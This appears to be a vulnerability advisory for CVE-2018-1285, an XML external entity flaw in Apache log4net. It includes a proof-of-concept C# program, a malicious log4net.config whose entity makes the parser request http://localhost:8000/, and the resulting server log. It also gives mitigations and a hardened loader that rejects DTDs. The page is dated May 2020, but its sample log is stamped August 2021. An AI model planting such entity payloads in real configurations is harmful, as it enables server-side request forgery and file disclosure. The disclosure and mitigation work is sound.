

Date: May 11, 2020


Apache log4net is an open-source logging utility that lets developers send log statements to a wide range of logging targets flexibly and quickly. It is configured through an XML configuration file that is easy to read and update. In affected versions, an attacker who can supply or modify that configuration file can inject malicious XML into it and harm the application.


CVE-2018-1285 exists because of how log4net parses XML configuration files: the parser is allowed to process XML external entities. If external entity processing is not disabled while a configuration file is parsed, an attacker who controls the file can use it as an attack vector.
An attacker can place a Document Type Definition (DTD) in the configuration file that declares an external entity; when the parser expands it, content from an attacker-chosen URI or local file is pulled into the document. As a result the attacker can make the processing application disclose the contents of local files, make outbound requests on its behalf (server-side request forgery), cause a denial of service, or produce other system impacts.
This class of attack is known as an XXE attack, short for "XML eXternal Entities".

PoC Details

.NET Framework 4
Log4net 2.0.8
Python 3.9.1

Below is a simple .NET Framework application that uses log4net to log an informative message.
The application reads log4net.config, which carries a malicious external entity whose expansion sends an HTTP request to an arbitrary address (for demonstration purposes "localhost" on port 8000). Make sure log4net.config is copied to the build output directory so the relative path used in the code resolves.
Set up a simple Python HTTP server listening on port 8000 on "localhost".
Now build and run the application: a request arrives at the Python server while the configuration is being parsed, proving SSRF through XXE.

PoC Code

// Program.cs - the application
using System.IO;
using System.Reflection;
using log4net;
using log4net.Config;

namespace CVE_2018_1285
{
    class Program
    {
        private static readonly ILog log = LogManager.GetLogger(typeof(Program));

        static void Main(string[] args)
        {
            // On log4net 2.0.8 XmlConfigurator parses the file with DTD processing
            // enabled, so the external entity is resolved while the file is read.
            var logRepository = LogManager.GetRepository(Assembly.GetEntryAssembly());
            XmlConfigurator.Configure(logRepository, new FileInfo("log4net.config"));

            log.Info("Hello from log4net");
        }
    }
}


// log4net.config content (the entity is referenced in the body so the parser expands it):
<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY xxe SYSTEM "http://localhost:8000/">
]>
<log4net>&xxe;</log4net>

// for a simple python server (listens on port 8000 by default), on cmd:
> python -m http.server

// When the built application runs, the following request is logged on the server side (::1 is the IPv6 loopback address):
::1 - - [24/Aug/2021 10:18:48] "GET / HTTP/1.1" 200

Affected Environments

Apache log4net versions before 2.0.10


Do not permit arbitrary configuration files to be specified by untrusted users
Disable DTDs completely


Update to log4net version 2.0.10 or higher
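A hardened loader that applies the "disable DTDs completely" workaround, as an added example that is not part of the original page or of log4net itself: it parses the configuration with DTD processing prohibited and no external resolver, then hands the resulting <log4net> element to XmlConfigurator so the configurator's own file parser (which on 2.0.8 processes DTDs) is bypassed. The class name SafeLog4netLoader, the two inline configuration strings and the console messages are constructed for this example.

```csharp
// SafeLog4netLoader.cs - hardened configuration loading (added example, not log4net's own code)
using System;
using System.IO;
using System.Reflection;
using System.Xml;
using log4net;
using log4net.Config;
using log4net.Repository;

namespace CVE_2018_1285
{
    static class SafeLog4netLoader
    {
        // Parse a log4net configuration with DTDs prohibited and no external resolver.
        // A <!DOCTYPE ...> (the carrier for XXE) makes XmlReader throw XmlException,
        // so the entity is never resolved and no request or file read takes place.
        public static XmlElement LoadConfigElement(TextReader configText)
        {
            var settings = new XmlReaderSettings
            {
                DtdProcessing = DtdProcessing.Prohibit, // reject any DOCTYPE outright
                XmlResolver = null                      // never fetch external resources
            };
            using (var reader = XmlReader.Create(configText, settings))
            {
                var doc = new XmlDocument { XmlResolver = null };
                doc.Load(reader);
                return doc.DocumentElement;
            }
        }

        // Feed the already-parsed <log4net> element to log4net. This overload takes an
        // XmlElement, so log4net 2.0.8's own file/stream parsing is not used at all.
        public static void Configure(ILoggerRepository repository, TextReader configText)
        {
            XmlElement root = LoadConfigElement(configText);
            if (root == null || root.LocalName != "log4net")
                throw new InvalidOperationException("configuration root must be <log4net>");
            XmlConfigurator.Configure(repository, root);
        }

        static void Main()
        {
            // Constructed sample inputs: the PoC's malicious config and a benign one.
            const string maliciousConfig =
                "<?xml version=\"1.0\" encoding=\"iso-8859-1\"?>\n" +
                "<!DOCTYPE foo [\n" +
                "  <!ELEMENT foo ANY>\n" +
                "  <!ENTITY xxe SYSTEM \"http://localhost:8000/\">\n" +
                "]>\n" +
                "<log4net>&xxe;</log4net>";
            const string benignConfig =
                "<log4net>\n" +
                "  <appender name=\"Console\" type=\"log4net.Appender.ConsoleAppender\">\n" +
                "    <layout type=\"log4net.Layout.PatternLayout\">\n" +
                "      <conversionPattern value=\"%date [%thread] %-5level %logger - %message%newline\" />\n" +
                "    </layout>\n" +
                "  </appender>\n" +
                "  <root><level value=\"INFO\" /><appender-ref ref=\"Console\" /></root>\n" +
                "</log4net>";

            ILoggerRepository repo = LogManager.GetRepository(Assembly.GetEntryAssembly());

            try
            {
                Configure(repo, new StringReader(maliciousConfig));
                Console.WriteLine("UNEXPECTED: malicious config accepted");
            }
            catch (XmlException e)
            {
                // DtdProcessing.Prohibit rejects the DOCTYPE; nothing was sent to port 8000.
                Console.WriteLine("Rejected malicious config: " + e.Message);
            }

            Configure(repo, new StringReader(benignConfig));
            LogManager.GetLogger(typeof(SafeLog4netLoader)).Info("Hello from a safely configured log4net");
        }
    }
}
```

With these settings the PoC configuration fails at the DOCTYPE with an XmlException before any entity is expanded, so no request reaches port 8000, while a DOCTYPE-free configuration loads normally. The loader only protects the code paths that go through it: any remaining XmlConfigurator.Configure(FileInfo) or ConfigureAndWatch call on 2.0.8 still parses the file with DTDs enabled, so upgrading to 2.0.10 remains the actual fix.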

Language: C#

Good to know:


Improper Restriction of XML External Entity Reference ('XXE') (CWE-611)


Upgrade Version

Upgrade to version log4net - 2.0.10


Base Score (CVSS v3.x, from the metrics below): 9.8 Critical
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High
Base Score (CVSS v2, from the metrics below): 7.5 High
Access Vector (AV): Network
Access Complexity (AC): Low
Authentication (AU): None
Confidentiality (C): Partial
Integrity (I): Partial
Availability (A): Partial